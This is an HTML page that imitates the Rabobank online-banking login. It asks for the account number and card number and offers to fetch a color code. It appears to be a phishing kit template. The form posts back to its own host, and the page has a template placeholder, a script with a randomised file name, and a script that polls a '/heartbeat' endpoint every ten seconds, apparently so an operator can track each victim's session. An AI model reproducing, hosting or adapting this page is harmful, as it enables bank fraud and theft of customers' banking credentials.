<!DOCTYPE HTML>
<html>
   <head>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <title>Rabobank - Inloggen</title>
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="HandheldFriendly" content="True">
      <meta name="viewport" content="width=device-width, initial-scale=0, maximum-scale=1.0, user-scalable=no">
      <meta name="format-detection" content="telephone=no">
      <meta http-equiv="cleartype" content="on">
      <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
      <link href="/public/rabo/img/favicon.ico" rel="shortcut icon">
      <meta charset="utf-8">
      <link rel="stylesheet" href="/public/rabo/css/rass-proto.css">
      <link rel="stylesheet" href="/public/rabo/css/www-extension.css">
      <link rel="stylesheet" href="/public/rabo/font/myriad/default.css">
   </head>
   <body class=" rass-chgen-rs">
      <div class="rass-pagetype-login rass-pagewrapper">
         <div id="rass-parallax-banner"></div>
         <div class="rass-container">
            <h1 aria-live="polite" class="rass-page-title">
               Inloggen<a href="" class="rass-ui-logo"><img src="/public/rabo/img/logo.png" alt="logo" /></a>
               <div class="langswitch">
                  <a data-rass-behavior="rass-action-linktoform" class="current" href="/klanten/qsl_switchlanguage.do?language=nl">NL</a>
                  <span>|</span>
                  <a data-rass-behavior="rass-action-linktoform"  href="/klanten/qsl_switchlanguage.do?language=en">EN</a>
               </div>
            </h1>
            <form id="loginform" method="post" autocomplete="off" data-rass-behavior="validate-form autosubmit-form" data-rass-resubmitmsg="Het verzoek is al verzonden. Een ogenblik geduld." class="rass-data-target">
               [@error]
               <a href="/klanten/qsl_switchreader.do?SelectedReader=rr" data-rass-behavior="switch-reader" class="rass-skiplink">Heeft u alleen een<br/>Random Reader? Klik<br/>hier om in te loggen met de <br />Random Reader.</a>
               <div class="rass-section-input">
                  <div class="input-wrapper">
                     <h2>Bankpas</h2>
                     <div data-rass-behavior="validate-iban reset-vc force-numkeypad" class="rass-wrapper-prefix">
                        <label for="rass-data-reknr">Rekeningnummer</label>
                        <div class="wrap">
                           <label class="rass-focushelper" for="rass-data-reknr"></label>        
                           <div class="col-a">
                              <div class="barcode rass-extend-prefix" id="rass-extend-prefix">NL • • RABO 0</div>
                           </div>
                           <div class="col-b">
                              <input autocomplete="off" id="rass-data-reknr" class="rass-data-target" type="text" maxlength="11" size="9" value="" name="AuthId" data-rass-behavior="rass-data-sync rass-state-autofocus" title="Laatste 9 cijfers van uw rekeningnummer" data-rass-validation="mandatory cnumeric 9clength" data-rass-msg="Rekeningnummer bestaat uit 9 cijfers"/>
                           </div>
                           <span class="clearfix"></span>
                        </div>
                        <em class="rass-ui-error"></em>
                     </div>
                     <a href="#" tabindex="0" role="tooltip" class="rass-info-link"></a>
                     <label for="rass-data-pasnr" data-rass-behavior="validate-pasnr reset-vc force-numkeypad" >
                     <span>Pasnummer</span>
                     <input autocomplete="off" id="rass-data-pasnr" class="barcode rass-data-target" name="AuthBpasNr" maxlength="4" size="4" type="text" value="" title="4 cijfers van uw pasnummer"  name="AuthId" data-rass-behavior="rass-data-sync" data-rass-validation="mandatory cnumeric 4clength" data-rass-msg="Pasnummer bestaat uit 4 cijfers"/>
                     <em class="rass-ui-error"></em>
                     </label>
                     <a href="#" tabindex="0" role="tooltip" class="rass-info-link"></a>
                  </div>
                  <div class="rass-ui-checkbox">
                     <input name="SessHrGebrChk" type="checkbox" id="rass-data-onthouden" data-rass-behavior="rass-data-sync"  />
                     <label for="rass-data-onthouden">Onthouden</label>
                  </div>
               </div>
               <div class="rass-section-action ">
                  <input  id="rass-action-getcolorcode" class="rass-button-primary" name="getcolorcode" type="submit" value="Kleurcode ophalen" />
               </div>
            </form>
            <form  method="post" autocomplete="off" data-rass-behavior="validate-form"  data-rass-resubmitmsg="Het verzoek is al verzonden. Een ogenblik geduld." class="rass-data-target rass-state-dynamic">
            </form>
            <div class="footer">
               <div>
                  <ul>
                     <li>
                        <a href="/help_inlogscherm" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-help-link rass-icon-link">Help</a>
                     </li>
                  </ul>
                  <p>
                     <br>Ziet u iets ongewoons? Stop en bel 0900 0906 (gebruikelijke belkosten).
                     <br>Belt u uit het buitenland? Bel dan +31 817 236 647
                  </p>
                  <ul>
                     <li>
                        <a href="/v" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-arrow-link rass-icon-link">Zo bankiert u veilig</a>
                     </li>
                  </ul>
               </div>
            </div>
         </div>
         <div class="rass-section-service">
            <h2>Service</h2>
            <ul>
               <li class="rass-rsp-nonmobile"><a href="/p_service_nietinloggen" rel="nofollow" data-rass-behavior="action-showinpopup">Problemen met inloggen</a></li>
               <li class="rass-rsp-nonmobile"><a href="/rs_faq" rel="nofollow" data-rass-behavior="action-showinpopup">Veel gestelde vragen over Rabo Scanner</a></li>
               <li class="rass-rsp-nonmobile"><a href="/raboscannerdemo-inlog" rel="nofollow" data-rass-behavior="action-showinpopup">Demo inloggen met Rabo Scanner</a></li>
               <li class="rass-rsp-nonmobile"><a href="/raboscanner1" rel="nofollow" data-rass-behavior="action-showinpopup">Meer informatie over Rabo Scanner</a></li>
            </ul>
            <ul>
               <li class="rass-rsp-nonmobile">
                  <form id="switchreaderform" action="/klanten/qsl_switchreader.do" method="post" autocomplete="off">
                     <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="da57821c2fe442e2bd76555045a3fa8f_1539006951559" />
                     <input type="hidden" name="SessHrGebrChk" value="false" />
                     <input type="hidden" name="AuthId" value="" />
                     <input type="hidden" name="AuthBpasNr" value="" />
                     <input name="SelectedReader" type="hidden" value="rr"/>
                     <input id="rass-action-switchreader" type="submit" class="rass-button-tertiary rass-icon-link" name="switchreader" value="Inloggen met Random Reader" />
                  </form>
               </li>
               <li class="rass-rsp-nonmobile"><a href="/p_rib_info" rel="nofollow" data-rass-behavior="action-showinpopup">Aanvragen Rabo Internetbankieren</a></li>
               <li class="rass-more"><a href="/meerservice" rel="nofollow" data-rass-behavior="action-showinpopup">Meer service</a></li>
            </ul>
         </div>
         <div class="rass-socialbar">
            <div class="rass-socialbar-topbar">
               <div class="rass-socialbar-slogan"><span>Rabobank</span></div>
            </div>
         </div>
      </div>
      <script language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.0/jquery.min.js"></script>
      <script type="text/javascript" src="/public/rabo/js/device.min.js"></script>		
      <script type="text/javascript" src="/public/rabo/js/asjrfkewqr8asdfqawqs.js"></script>	
      <script language="JavaScript" src="/public/iznzg/js/jquery-3.3.1.min.js"></script>
      <script type="text/javascript">
         var interval = 10000;  // 1000 = 1 second, 3000 = 3 seconds
         function doAjax() {
            $.ajax({
            type: 'POST',
            url: '/heartbeat',
            data: $(this).serialize(),
            dataType: 'json',
            complete: function (data) {
                    setTimeout(doAjax, interval);
            }
         });
         }
         setTimeout(doAjax, interval);
      </script>
   </body>
</html>

